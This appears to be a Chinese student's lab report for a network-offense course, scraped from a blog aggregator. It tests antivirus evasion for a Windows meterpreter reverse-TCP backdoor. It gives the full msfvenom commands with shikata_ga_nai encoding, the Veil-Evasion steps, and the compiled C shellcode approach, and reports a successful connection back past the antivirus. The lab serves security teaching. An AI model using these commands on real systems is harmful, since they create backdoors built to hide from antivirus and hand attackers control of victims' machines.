2. 程式人生 > >20155338《網絡對抗》Exp3 免殺原理與實踐

20155338《網絡對抗》Exp3 免殺原理與實踐

阿新 發佈:2018-04-10
調用 編寫 上傳 權限 免殺 編譯運行 tcp 檢查 語言

20155338《網絡對抗》Exp3 免殺原理與實踐

實驗過程

一、免殺效果參考基準

Kali使用上次實驗msfvenom產生後門的可執行文件,上傳到老師提供的網址http://www.virscan.org/上進行掃描,有48%的殺軟報告病毒。
技術分享圖片

二、使用msf編碼器

  • 編碼一次,在Kali輸入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5338端口號 -f exe >後門名字.exe
技術分享圖片

結果被查出率降低了,可能是因為進行了編碼的緣故,所以網站監測結果降低了 5個百分點。
技術分享圖片

  • 多次編碼,在Kali中輸入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的IP LPORT=5338端口號 -f exe > 後門名字.exe
技術分享圖片

多次編碼好像和第一次的結果差不多,恢復後依然放入網站檢查。
技術分享圖片

三、使用Veil-Evasion重新編寫源代碼

  • 這裏直接使用的是老師的Kali,veil已經安裝好。

  • 在Kali的終端中啟動Veil-Evasion

  • 命令行中輸入veil,後在veil中輸入命令use evasion

  • 依次輸入如下命令生成你的可執行文件:
    use c/meterpreter/rev_tcp.py


    技術分享圖片

  • set LHOST Kali的IP
  • set LPORT 端口號
  • generate

  • 可執行文件的文件名
    技術分享圖片
    技術分享圖片

掃描結果

技術分享圖片

四、C語言調用Shellcode

  • 首先,在Kali上使用命令生成一個c語言格式的Shellcode數組。
    技術分享圖片

  • 由VS編譯運行生成一個.exe文件
    技術分享圖片
    技術分享圖片

  • 之後放入網站進行檢測,效果還比較客觀,只有百分之20的被查出率
    技術分享圖片

五、實測進行回連

  • 按照上次實驗用過的msf監聽方法在Kali上打開監聽,在Win主機開啟殺軟的情況下,運行最後生成的優化版exe文件,Kali成功獲取了Win主機的權限
    技術分享圖片

20155338《網絡對抗》Exp3 免殺原理與實踐

相關推薦

對抗 Exp3 原理實踐 20154311 王卓然

下載軟件 get 改變 網站 加密 純手工 com 代碼 操作模式 Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? ①基於特征碼的檢測:AV軟件廠商通過檢測一個可執行文件是否包含一段與特征碼庫中相匹配的特征碼從而判斷是

20155338對抗Exp3 原理實踐

調用 編寫 上傳 權限 免殺 編譯運行 tcp 檢查 語言 20155338《網絡對抗》Exp3 免殺原理與實踐 實驗過程 一、免殺效果參考基準 Kali使用上次實驗msfvenom產生後門的可執行文件,上傳到老師提供的網址http://www.virscan.org/上進

2017-2018-4 20155317《對抗技術》EXP3 原理實踐

運行 log jar idt 連通 進行 all 結果 暫時 2017-2018-4 20155317《網絡對抗技術》EXP3 免殺原理與實踐 一、問題回答 (1)殺軟是如何檢測出惡意代碼的? (2)免殺是做什麽? (3)免殺的基本方法有哪些? 2.實踐 (1) 正確

20154307《對抗Exp3 原理實踐

mark 我們 blocks 意思 釣魚 class 做了 更改權限 asio 20154307《網絡對抗》Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測:殺毒軟件檢測到有程序包含的特征碼與其特征碼庫的代碼相匹配,就會把該程

20155232《對抗Exp3 原理實踐

分享圖片 alt 特征碼 apt 基本 什麽 簡單介紹 主機 介紹 20155232《網絡對抗》Exp3 免殺原理與實踐 問題回答 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測 特征碼:一段特征碼就是一段或多段數據。 如果一個可執行文件(或其

2018-2019-2 對抗技術 20165311 Exp3 原理實踐

col eno 比較 encode var 針對 name -s cnblogs 2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐 免殺原理及基礎問題回答 實驗內容 任務一:正確使用msf編碼器,msfvenom生成如j

2018-2019-2 對抗技術 20165334 Exp3 原理實踐

語言 保護 r文件 原理 添加 ima port 復制 png 2018-2019-2 網絡對抗技術 20165334 Exp3 免殺原理與實踐 一、實驗內容 任務一正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,利用shellc

2018-2019-2 對抗技術 20165210 Exp3 原理實踐

問題 網站 丟失 其他 圖片 https 壓縮包 exe 生成 2018-2019-2 網絡對抗技術 20165210 Exp3 免殺原理與實踐 免殺的概述 免殺,也就是反病毒(AntiVirus)與反間諜(AntiSpyware)的對立面,英文為Anti-AntiViru

2018-2019-2 對抗技術 20165326 Exp3 原理實踐

log ant tool 能夠 校驗和 nco bin .html 錯誤代碼 免殺原理與實踐 目錄 知識點問答 實踐內容 遇到的問題 心得體會 知識點 meterpreter免殺 基礎問題回答 殺軟是如何檢測出惡意代碼的? 特征碼(基於簽名):模式匹配,比對特

20165214 2018-2019-2 《對抗技術》Exp3 原理實踐 Week5

實現 進行 中間 信息 失敗 中一 網絡安全 需要 識別 《網絡對抗技術》Exp3 免殺原理與實踐 Week5 一、實驗內容 1、正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程; 2、通過組

20164317《對抗技術》Exp3 原理實踐

實驗中遇到的問題 不同的 靜默安裝 組合 alt ping 程序 upx 上一個 一、實驗要求 1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellco

20155227《對抗》Exp2 後門原理實踐

web img 準備 etc ons 並運行 reverse 體會 定時 20155227《網絡對抗》Exp2 後門原理與實踐 基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? 在非官方網站下載軟件時,後門很可能被捆綁在軟件中。 攻擊者利用欺騙的手段,

20154324 劉康權 《對抗》Exp2 後門原理實踐

nsh png netcat nta vim編輯 時間 clas 自己的 rontab 一、實踐目標與內容 1.學習內容 使用nc實現win,mac,Linux間的後門連接 meterpreter的應用 MSF POST 模塊的應用 2.學習目標 學習建立一個後門連接

Exp3 原理實踐20154302薛師凡

代碼 AR 軟件 可執行文件 別了 模板生成 倒序 即使 get Exp3 免殺原理與實踐20154302薛師凡 一、實踐目標與內容 利用多種工具實現實現惡意代碼免殺 在另一臺電腦上,殺軟開啟的情況下,實現運行後門程序並回連成功。 在保證後門程序功能的情況下實現殺軟共存。

Exp3 原理實踐

asi 目標 專業 http lac 基礎 put 源文件 是個 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? -檢測特征碼 -基於行為檢測 -啟發式檢測類似 (2)免殺是做什麽? 使惡意軟件不被AV檢

20155202張旭 Exp3 原理實踐

ever 難受 virus 分片 告訴 kali 基於 文件夾 梳理 20155202張旭 Exp3 免殺原理與實踐 AV廠商檢測惡意軟件的方式主流的就三種: 基於特征碼的檢測 啟發式惡意軟件檢測 基於行為的惡意軟件檢測 我們要做的就是讓我們的惡意軟件沒法被這三種方式找到

20155320 Exp3 原理實踐

可執行 惡意代碼 執行 AR 後門 lock 函數 工具 文件復制 20155320 Exp3 免殺原理與實踐 免殺 一般是對惡意軟件做處理,讓它不被殺毒軟件所檢測。也是滲透測試中需要使用到的技術。 【基礎問題回答】 (1)殺軟是如何檢測出惡意代碼的? 1.通過行

20155219付穎卓 Exp3 原理實踐

但是 遇到 有一個 執行文件 圖書館 是個 alt .cn 現在 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 殺毒軟件有一個病毒的特征碼庫,通過識別惡意代碼的特征碼或者特征片段檢測惡意代碼 殺毒軟件通過動態檢測對象文件的行為來識別惡意代碼,如果他的行為在一定程度

Exp3 原理實踐 ——20164316張子遙

ping 開啟 後門 tro 技術 創建 判斷 問題 rev 一、實踐基本內容 1.實踐目標 (1) 正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程 (2)通過組合應用各種技術實現惡意代

20165207 Exp3 原理實踐

編碼器 想要 功能 函數名 取值 generate 開始 重新 全局 Exp3 免殺原理與實踐 1、實驗內容 1.1、使用msf 1.1.1、 確定基準線 首先看kali的ip 直接msfvenom的結果,不加其他的東西: 使用VirusTotal得到的檢測這個程序得到